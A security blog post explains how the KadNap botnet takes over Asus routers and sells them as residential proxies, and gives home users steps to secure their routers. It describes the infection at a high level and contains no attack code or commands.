Kadnap Malware: How This Router Hijack Botnet Works & How to Stay Safe?

Your internet feels a little slow today. Maybe it’s just traffic, right? Wrong. It could be cybercriminals silently using your router to commit crimes — and you’d never know.

The Threat No One Is Talking About (Until Now)

A silent digital predator is prowling home networks across America — and most victims don’t even know they’ve been targeted.

It’s called Kadnap malware, and it’s not just another virus. This is a sophisticated, next-generation router hijack operation that turns your innocent home device into a weapon for global cybercrime.

Discovered by the Black Lotus Labs team at Lumen Technologies, KadNap primarily targets Asus routers, conscripting them into a botnet that proxies malicious traffic. Lumen And it’s been growing in the shadows since August 2025.

The Numbers Are Shocking — Here’s What We Know

Before diving into how it works, let’s talk scale. Because the Kadnap malware router hijack isn’t a small, isolated incident:

• 14,000+ devices have already been infected, with more than 60% of victims located in the United States.
• The daily count of compromised devices jumped from roughly 10,000 in August 2025 to over 14,000 today.
• Infections have also been detected in Taiwan, Hong Kong, Russia, the UK, Australia, Brazil, France, Italy, and Spain.
• The proxy service linked to KadNap — called Doppelgänger — claims to offer residential proxies in over 50 countries.

This isn’t a niche cybersecurity story. This is happening in living rooms, home offices, and small businesses right now.

So… What Exactly Is Kadnap Malware?

Think of your router as the front door of your house. Kadnap malware doesn’t kick the door down — it quietly makes a copy of your key, lets itself in whenever it wants, and rents your house out to criminals while you’re asleep.

Once a device is infected, it is silently enrolled into a peer-to-peer network and used as a proxy for routing malicious traffic — completely without the owner’s knowledge.

The name itself tells the story: KadNap gets its name from its use of a customized version of the Kademlia Distributed Hash Table (DHT) protocol — the same decentralized architecture used by some file-sharing networks.

In plain English? It hides in plain sight, disguised as normal internet traffic.

How Does the Kadnap Malware Router Hijack Actually Work?

This is where it gets technically fascinating — and terrifying.

Step 1: The Initial Infection

A KadNap infection begins with the download of a malicious shell script called aic.sh from a command-and-control server, which establishes persistence via a cron job that runs every 55 minutes.

Step 2: Deep Embedding

The file creates a cron job that retrieves the shell script, renames it to .asusrouter, and runs it — a naming choice clearly designed to blend in with legitimate router processes.

Step 3: The Peer-to-Peer Network

KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which conceals the IP address of the attackers’ infrastructure within a peer-to-peer system to evade traditional network monitoring.

This is the genius — and the menace — of this attack. Traditional malware uses central servers that can be identified and shut down. KadNap doesn’t.

Step 4: Sold to the Highest Bidder

Compromised routers power a paid proxy service called Doppelganger, which routes customers’ internet traffic through the residential connections of people who have no idea it’s happening.

These services are typically used to launch distributed denial-of-service (DDoS) attacks, credential stuffing, and brute-force attacks.

Why Is This Botnet So Hard to Remove?

Most botnets have a weakness: their central command server. Find it, shut it down, and the botnet collapses. Kadnap malware was engineered to eliminate that weakness entirely.

Its decentralized design means there is no central server that could be easily shut down by law enforcement, making the KadNap botnet incredibly resilient to attempts to dismantle it.

Here’s what makes it uniquely dangerous:

• No central point of failure — the network is distributed across all infected devices
• Encrypted communications — KadNap establishes AES-protected channels for encrypted command traffic.
• Invisible to the victim — for the average owner of an infected Asus router, the malware would be undetectable beyond internet speeds feeling slightly sluggish at times.
• Bypasses security filters — using traffic from household routers means attackers can bypass conventional security filters, as it looks like the traffic is coming from the average person browsing the web

Wait — Does a Simple Reboot Fix It?

If you’re thinking “I’ll just restart my router,” we have bad news.

KadNap stores a shell script that automatically re-executes when a compromised router restarts, so powering the device off and on again changes nothing.

A reboot won’t save you. This infection has roots.

Who Is Behind This? The Doppelganger Connection

The criminal ecosystem powering Kadnap malware router hijack is more organized than most people realize.

The KadNap botnet is linked to the Doppelganger proxy service, believed to be a rebrand of the Faceless service previously associated with the TheMoon malware botnet — which also targeted Asus routers.

The Doppelganger service appears to have launched in May or June 2025, and the KadNap malware that feeds it was first detected in the wild in August 2025.

This is an organized cybercrime operation — not a lone hacker in a basement. These are professional criminals running what amounts to a criminal proxy marketplace.

Am I at Risk? Signs Your Router May Be Compromised

Ask yourself these questions:

• Are you running an Asus router with older firmware?
• Have you never changed your router’s default admin password?
• Is your router’s management interface exposed to the internet?
• Have you noticed your internet speeds becoming mysteriously slower?
• Has your internet bill spiked with unexplained data usage?

If you answered yes to even one of these, your device could be at elevated risk of a Kadnap malware router hijack.

How to Protect Yourself: 6 Steps to Secure Your Router Right Now

The good news? Security experts have outlined a clear protection roadmap. Here’s what they recommend:

1. Update your firmware immediately — regularly check for and install the latest security patches to close known vulnerabilities.
2. Do a full factory reset (not just a reboot) — if you suspect infection, only a complete reset removes the malware
3. Change your default admin password — make it long, unique, and complex
4. Disable remote management — ensure the router’s administrative login page is not exposed to the public internet and disable remote management features when not actively required.
5. Replace end-of-life devices — users are advised to replace models that are end-of-life and no longer support.
6. Check the IoC list — anyone worried about their router should check Black Lotus Labs’ published list of IP addresses and file hashes found in infected device logs

What’s the Wider Cybersecurity Industry Doing?

The response from the security community has been swift — but the threat remains active.

Lumen has proactively blocked all network traffic to or from the KadNap control infrastructure and will begin distributing indicators of compromise (IoCs) into public feeds to enable others to help disrupt this threat.

Researchers concluded: “Their intention is clear — avoid detection and make it difficult for defenders to protect against. Every IP address associated with this botnet represents a significant, persistent risk to organizations and individuals alike.”

The battle is ongoing. And your router is on the front line.

The Bottom Line: Your Router Is Not Just a Router Anymore

The Kadnap malware router hijack is a wake-up call for every household and small business that has ever thought “who would bother hacking my router?”

The answer: criminals who don’t care about you specifically. They care about your IP address, your bandwidth, and your clean internet reputation — all of which they can sell.

Threat actors are building large-scale botnets specifically designed to hijack devices, using them to route traffic and evade detection by network security systems. Your router is the perfect disguise for their crimes.

Don’t let your home network become a criminal’s getaway car.

Take Action Right Now — Before It’s Too Late

Your router security cannot wait until tomorrow. Here’s your immediate action plan:

1. Log into your router admin panel today and check for firmware updates.

2. Change your admin password to something strong and unique.

3. Disable remote management unless you absolutely need it.

4. Visit Black Lotus Labs to check the latest IoCs and see if your IP appears on the compromised list. 5. If your router is end-of-life — replace it. Today.

Share this post with every friend, family member, or colleague who owns a home router. They deserve to know their network could already be hijacked.

The cybercriminals behind Kadnap malware are counting on your inaction. Don’t give it to them.

Sources: Lumen Black Lotus Labs, The Hacker News, BleepingComputer, Security Affairs — March 2026

Related posts:

What is the best Top Rootkit Scanners Tools? What is the Difference between Spoofing And Snooping? Web War I: The Dawn of Cyber Warfare | Estonia’s Fight for Digital Independence How To Protect Your Email From Cyber Attacks?